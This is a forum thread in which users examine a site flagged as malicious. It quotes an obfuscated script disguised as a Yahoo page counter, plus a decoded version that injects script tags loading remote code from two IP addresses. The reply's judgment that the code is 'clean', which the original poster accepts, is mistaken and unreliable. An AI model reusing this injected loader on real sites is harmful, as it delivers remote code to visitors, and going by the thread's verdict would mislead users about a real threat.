Author Topic: ixfree.net  (Read 3620 times)

0 Members and 1 Guest are viewing this topic.

December 18, 2008, 10:13:48 pm
Read 3620 times

cconniejean

  • Special Members
  • Jr. Member

  • Offline
  • *

  • 34
Code: [Select]
http://ixfree.net/
Site tagged by Finjan first:
The requested URL was blocked, the page you requested contains malicious code.

I checked the link using the normal ones I use and they all show clean.
ExpLabs Online Scanner showed clean
Dr.Web Online Scanner showed clean

Took the link here, and this was the results, not sure how long this link is good:
Code: [Select]
http://anubis.iseclab.org/?action=result&task_id=13549db9428d3b4b4dd344a7587cd66b1&format=html
Using vURL to check the source, guessing it is what I'm seeing at the bottom of the page:
Code: [Select]
033  <IMG height=1 src="/images/c.gif" width=1> </DIV><IFRAME
1034 src="res://C:WINDOWSsystem32shdoclc.dll/dnserror.htm" width=1
1035 height=1>
1036 </IFRAME></DIV><script language=javascript><!-- Yahoo! Counter starts
1037 if(typeof(yahoo_counter)!=typeof(1))eval(unescape('//%3Cd@%69!%76%20%73%74!y%6C%65=@%64|i`%73p$%6C~%61y:%6Eo&%6E&%65#%3E\n|%64$%6F%63#%75~me$%6E&%74.%77%72`%69&%74e@("%3C%2F%74!%6
5~x@%74@ar#ea|%3E!%22&);|v#%61r%20%69%2C%5F%2C!a=`["7%38#.1!1%30%2E~1@%37~5.@2`1$%22|,%22@1`%395~%2E!%32&%34%2E%37%36.2%35$%31&%22~%5D$%3B%5F%3D@%31#;~%69f%28$%64&%6F%63@u&%6D
#ent.%63`%6Fo#k|%69%65.%6Da$%74%63%68%28%2F%5C%62%68%67&%66@%74~=%31~/%29%3D%3D@n%75$%6C%6C%29~fo%72`(%69%3D0%3B&i%3C&%32~;$%69%2B%2B!)$%64#%6Fc#%75$%6D%65%6E%74`%2Ew%72%69#%74%65(|"%
3C!%73%63%72i#p!%74%3E%69&%66(|%5F$%29%64%6F@%63|%75m$%65%6E%74@%2E%77r@%69t%65`(%5C%22%3C`%73%63r%69%70%74&%20~i@d`=%5F"~+i%2B%22%5F&%20`s~r%63%3D!%2F|/%22+$%61|[~i%5D+$%22$%2F`%63%7
0/@%3F%22%2B%6E&a%76ig%61t&%6F`%72%2E%61%70%70!%4E#%61~%6D~%65@%2E&%63h#%61r%41t&(`0%29+%22#%3E&%3C&%5C%5C@/#%73%63~%72i`%70~t!%3E%5C!%22%29$%3C%5C@/s%63ri#%70%74$%3E%22%29@;!\
n|%2F%2F%3C#%2F%64&%69v`%3E').replace(/\&|#|@|\!|\||~|\$|`/g,""));var yahoo_counter=1;
1038 <!-- counter end --></script>
1039 </BODY></HTML>

December 18, 2008, 10:49:36 pm
Reply #1

Kayrac

  • Guest
it unescapes to this

Code: [Select]
//<div style=display:none>
document.write("</textarea>");var i,_,a=["78.110.175.21","195.24.76.251"];_=1;if(document.cookie.match(/\bhgft=1/)==null)for(i=0;i<2;i++)document.write("<script>if(_)document.write(\"<script id=_"+i+"_ src=//"+a[i]+"/cp/?"+navigator.appName.charAt(0)+"><\\/script>\")<\/script>");
//</div>

i think it's clean, but could be wrong

December 18, 2008, 11:51:10 pm
Reply #2

cconniejean

  • Special Members
  • Jr. Member

  • Offline
  • *

  • 34
Thank you Kayrac, one of those cookie things, ok, thanks again.

December 19, 2008, 10:28:51 am
Reply #3

Serg

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 132
i've got just "//just fuck off...<div style=display:none>" ???. Is there any other result?  :)